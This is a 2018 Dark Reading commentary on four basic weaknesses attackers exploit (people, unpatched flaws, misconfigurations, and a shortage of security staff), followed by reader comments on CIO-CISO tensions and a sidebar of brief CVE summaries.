Attacks/Breaches

7/5/2018
10:30 AM
David Pearson
David Pearson
Commentary
Connect Directly
Twitter
LinkedIn
RSS
E-Mail vvv
50%
50%

4 Basic Principles to Help Keep Hackers Out

The most effective hackers keep things simple, something organizations must take into account.

Organizations continue to learn the hard way that when it comes to IT security, the simplest things often cause the biggest problems. A network is only as secure as its weakest link, so hackers don't need to spend the time and money it takes to develop advanced persistent threats or zero-day attacks; they just need to focus on finding the easiest ways of getting in. In other words, the most effective hackers keep things simple, something organizations must take into account.

With that in mind, here are four basic principles that attackers exploit and companies need to stay on top of in order to secure their network.

1. People Are Almost Your Most-Targeted Link
Hackers looking for a way to infiltrate a network often start with the vulnerabilities of key users — 81% of hacking-related breaches leveraged either stolen and/or weak passwords, according to last year's Verizon Data Breach Investigations Report. Troubling statistics like this should remind us that people are often the hardest part of the security equation. People are fallible and emotional, which is why even regular security awareness training has its blind spots.

Think about it — how easy is it to make somebody's emotions take over in today's world? In the age of connectivity and social networks, it's easier than ever to find professional, personal, or political information that can allow an attacker to craft personalized lures that trigger a response. Inducing such feelings can often lead to irrational behavior, which in return can be something that can be exploited digitally. Additionally, as the lines blur between personal and professional communication platforms, it is important to make sure that security awareness training, especially when it comes to phishing, translates into the new mediums.

2. Flaws Remain Unfixed
Vendors and researchers don't always have the same goals or objectives, and security suffers as a result. There have been many cases where a researcher is forced to publish a legitimate vulnerability publicly because a vendor recognizes it as a true security issue when the matter is brought to its attention privately. This leaves gaping holes for attackers to exploit.

Similarly, when the company in charge of updates is not the owner of the piece of code exhibiting a vulnerability, flaws can remain for an extended period. For example, it can take a long time for a cellphone provider to push an update to users after Google fixes an Android security flaw in the OS. Flaws like this will always be present, providing an entry point for even the least-sophisticated attackers to access a network.

3. If There's a Mistake, Someone Will Find It
As automation continues to be a key outcome of digital transformation, the "good guys" aren't the only ones to benefit. Attackers are taking advantage of today's automated world and can easily scan for vulnerabilities. There are numerous public and paid services that allow users to explore the Internet pretty much anonymously, looking for misconfigurations that exist on anything from Internet of Things toasters to government cloud instances.

It's no longer a question of if somebody will discover your mistake, but when (and more importantly, how long after it's been exposed). This story played repeatedly in the breaches of 2017. Amazon Web Services' S3 breach is one example. Attackers found a misconfiguration in AWS's storage buckets, which allowed public write access, enabling attackers to launch silent man-in-the-middle attacks and other hacks on a company's customers or internal staff.

It's important to remember that misconfigurations extend beyond just missing patches and default settings to things like network paths that don't need to exist, giving sweeping landscapes to monitor.

4. There Is a Security Workforce Shortage
In 2019, there will be a global shortage of 2 million cybersecurity professionals, according to ISACA, a nonprofit information security advocacy group. To compound the challenges caused by this lack of skilled analysts even more, the ones who are on the front lines are asked to do the impossible. They can't keep up with the barrage of alerts that come from so many sources. The flow is simply too great, and incidents are missed.

When an event is investigated, security teams are using so many internal and external tools, scripts, and conversations to get the relevant context that each investigation is a long and tedious process. This combination of factors is leaving security teams burned out and companies vulnerable.

Once again, hackers are acutely aware of these challenges that organizations face. They know that simple techniques of attack will fly under the radar and may not be scored as a "priority" because analysts are too busy spending their time looking for larger, more complicated threats. It's why attackers will try to live off the land more and more, using underlying sysadmin tools preinstalled with the operating system.

What Does It All Mean?
In the end, understanding the basic principles that hackers are using to infiltrate your network is an important part of staying one step ahead of them. But remember that even the basics will change over time. The most effective thing you can do to overcome these simple, yet evolving threats is to focus on the people protecting your organization.

These people need to understand their role in securing the environment and the overall impact of the decisions they make. Make sure analysts know what they are protecting and ensure the right controls are in place to stay focused. Finally, be certain that the security teams have the visibility and the tools they need to detect, investigate, and respond quickly and efficiently.

Related Content:

Learn from the industry's most knowledgeable CISOs and IT security experts in a setting that is conducive to interaction and conversation. Register before July 27 and save $700! Click for more info

David Pearson has been analyzing network traffic for well over a decade, having used Wireshark ever since it was Ethereal. He has spent the majority of his professional career understanding how networks and applications work, currently as Principal Threat Researcher for Awake ... View Full Bio
Comment  | 
Print  | 
More Insights
Comments
Newest First  |  Oldest First  |  Threaded View
Joe Stanganelli
50%
50%
Joe Stanganelli,
User Rank: Ninja
7/9/2018 | 7:52:42 PM
Re: CIO-CISO conflict
@Christian: Alas, the trend of high-level execs simply outsourcing anything cybersecurity-related wholesale -- strategy and all -- without much forethought -- continues, as I recently observed for a Dark Reading sister site here: securitynow.com/author.asp?section_id=613&doc_id=738870

While I generally agree with you, I will say that one thing that concerns me about stereotypes and stereotypical perceptions is the generalized notion (certainly not all of them) of hackers and IT admins and devs pooh-poohing the lawyers and compliance peeps, which could be problematic for a CISO if that view pervaded to that level.

Of course, technically, security, compliance, and privacy are all three separate circles on the Venn diagram of data stewardship... perhaps we need a Chief Data Steward to oversee -- or, at least, help integrate -- all three.
No SOPA
100%
0%
No SOPA,
User Rank: Ninja
7/6/2018 | 3:26:53 PM
Re: CIO-CISO conflict
To Joe's point, as a past code-monkey I definitely was guilty of seeing CISO leaders as just another C-Level lackey.  I've been reading a lot more articles the last couple years that identify the role of CISO of suffering not only in that area, but also from the general perception that the real InfoSec knowledge sits with lower-level managers and hackers.  When I was younger, we saw the C-Levels pimping expensive software packages, trying to fill gaps in process with bloatware and 3rd party vendors.  From my perspective, the real talent reading whitepapers, following cutting edge tech from visionaries and testing out new code ideas in virtual environments were the grunts in the code trenches, not the C-Levels, not the CISOs, but the front-line cyber defenders who never slept, never wore a suit, and so on.  I could point to plenty of CISOs now who came up from those trenches and have earned respect and the right to be heard, but in the overall business model, I'm afraid the CISO is still not seen any differently than the rest of the often disposable and (frankly) figure-head C-Level roles.  I think if that role were carefully trimmed and only truly qualified and knowledgeable hackers were placed there, the idea of the CISO as a "lackey" or "underling" might fade and the industry also start moving away from the C-Level chains that so many Enterprise organizations still suffer from.
Joe Stanganelli
100%
0%
Joe Stanganelli,
User Rank: Ninja
7/5/2018 | 2:28:26 PM
CIO-CISO conflict
Unfixed flaws and unpatched vulnerabilities will remain an issue as long as the CISO is treated as some sort of underling -- whether a direct report or not -- to the CIO. The CIO is judged against business agility objectives, which can run completely counter to the interests of the CISO's office.
Veterans Find New Roles in Enterprise Cybersecurity
Kelly Sheridan, Staff Editor, Dark Reading,  11/12/2018
Empathy: The Next Killer App for Cybersecurity?
Shay Colson, CISSP, Senior Manager, CyberClarity360,  11/13/2018
Understanding Evil Twin AP Attacks and How to Prevent Them
Ryan Orsi, Director of Product Management for Wi-Fi at WatchGuard Technologies,  11/14/2018
Register for Dark Reading Newsletters
White Papers
Video
Cartoon
Current Issue
Flash Poll
Online Malware and Threats: A Profile of Today's Security Posture
Online Malware and Threats: A Profile of Today's Security Posture
This report offers insight on how security professionals plan to invest in cybersecurity, and how they are prioritizing their resources. Find out what your peers have planned today!
Twitter Feed
Dark Reading - Bug Report
Bug Report
Enterprise Vulnerabilities
From DHS/US-CERT's National Vulnerability Database
CVE-2018-15769
PUBLISHED: 2018-11-16
RSA BSAFE Micro Edition Suite versions prior to 4.0.11 (in 4.0.x series) and versions prior to 4.1.6.2 (in 4.1.x series) contain a key management error issue. A malicious TLS server could potentially cause a Denial Of Service (DoS) on TLS clients during the handshake when a very large prime value is...
CVE-2018-18955
PUBLISHED: 2018-11-16
In the Linux kernel 4.15.x through 4.19.x before 4.19.2, map_write() in kernel/user_namespace.c allows privilege escalation because it mishandles nested user namespaces with more than 5 UID or GID ranges. A user who has CAP_SYS_ADMIN in an affected user namespace can bypass access controls on resour...
CVE-2018-19311
PUBLISHED: 2018-11-16
Centreon 3.4.x allows XSS via the Service field to the main.php?p=20201 URI, as demonstrated by the "Monitoring > Status Details > Services" screen.
CVE-2018-19312
PUBLISHED: 2018-11-16
Centreon 3.4.x allows SQL Injection via the searchVM parameter to the main.php?p=20408 URI.
CVE-2018-19318
PUBLISHED: 2018-11-16
SRCMS 3.0.0 allows CSRF via admin.php?m=Admin&c=manager&a=update to change the username and password of the super administrator account.